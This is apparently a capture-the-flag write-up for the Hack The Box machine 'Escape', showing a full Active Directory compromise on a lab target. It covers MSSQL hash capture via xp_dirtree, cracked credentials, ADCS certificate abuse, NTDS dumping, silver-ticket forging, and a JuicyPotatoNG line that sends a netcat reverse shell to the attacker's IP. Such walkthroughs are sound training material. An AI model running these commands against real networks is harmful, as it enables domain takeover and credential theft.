Escape a medium rated box involved enumerating smb shares as an anonymous user and finding pdf file containing credentials to mssql, leading to coerce NTLM authentication for sql_svc through xp_dirtree giving us the NTLMv2 hash, on cracking the hash we could go two ways one being the un-intended way of forging a silver ticket, getting a shell as sql_svc and impersonating administrator through SeImpersonate privilege while the intended way being getting a shell through WinRM, finding the password of Ryan.Cooper from sql server error log and abusing ADCS template to get administrator.
NMAP
Nmap scan report for 10.10.11.202
Host is up (0.26s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 22:30:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T03:01:12
| Not valid after: 2053-02-26T03:01:12
| MD5: 21884a6bf954052953ea17d7d48ef578
|_SHA-1: a5c4b21438d9864636d0923db5bc3785598f6364
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPCAdding the FQDN in /etc/hosts file
PORT 139/445 (SMB)
Checking for null authentication of smb we do see some shares
From Public share we see a pdf document
On the first page of the document it talks about accessing SQL Server with a non domain joined machine also it reveals three potential usernames Tom, Brandon and Ryan
On the next page we’ll see the credentials for PublicUser
Foothold
We can just try using impacket’s mssqclient to login into the database using the credentials we found
mssqlclient.py PublicUser:GuestUserCantWrite1@sequel.htbOn Trying to enable xp_cmdshell failed as the user didn’t had the required privileges.
With xp_dirtree we can capture the NTLMv2 hash of the account with which the mssql service is running
xp_dirtree \\10.10.14.70\uwuWith hashcat we can crack the hash with the password REGGIE1234ronnie
On trying to login with this account on mssql, it didn’t worked
With sql_svc we can enumerate domain users
However it wouldn’t login to mssql
Running bloodhound to enumerate the domain
python3 /opt/BloodHound.py/bloodhound.py -d 'sequel.htb' -u 'sql_svc' -p 'REGGIE1234ronnie' -c all -ns 10.10.11.202From bloodhound we can see this user has CanPsRemote on DC which means we can login through WinRM service which can be done using evil-winrm
evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'Privilege Escalation (Ryan.Cooper)
Checking C:\SQLServer\Logs\ERRORLOG.BAK, we'll find the password for Ryan.Cooper
Privilege Escalation (Administrator)
After logging using Certify to check vulnerable certificate template, this can be downloaded from here
./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administratorCopy the certificate in a file cert.pem
Convert it to cert.pfx
Transferring it back to the windows machine with Rubues to get TGT of administrator
Converting the kirbi ticket to ccache with ticketconverter
Having the administrator’s ticket we can runsecretsdump.py to dump NTDS
And now we can simply login with the administrator’s hash to get a shell as administrator on the machine.
Un-Intended (Silver Ticket)
As sql_svc was not able to login mssql, we can try forging a silver ticket to impersonate as the administrator on mssql, we need the NTLM hash of the sql_svc and the domain sid
import hashlib,binascii
hash = hashlib.new('md4', "REGGIE1234ronnie".encode('utf-16le')).digest();
print (binascii.hexlify(hash));Through rpcclient , we can get the domain sid
With ticketer.py we can create the silver ticket
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -spn MSSQLSvc/dc.sequel.htb -domain sequel.htb -domain-sid S-1-5-21-4078382237-1492182817-2568127209 administratorBefore running mssqlclient , make sure to synchronize the time zone with ntpdate
mssqlclient.py dc.sequel.htb -k -no-pass
sudo ntpdate dc.sequel.htbNow we can enable xp_cmdshell to execute commands
Transferring netcat and getting a reverse shell
If we check running whoami /all, it will show that there's SeImpersonatePrivilege enabled meaning that we can abuse that to get a SYSTEM token and eventually get a system shell
With JuicyPotato-NG, we can get a reverse shell as SYSTEM
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.70 80 -e cmd.exe"
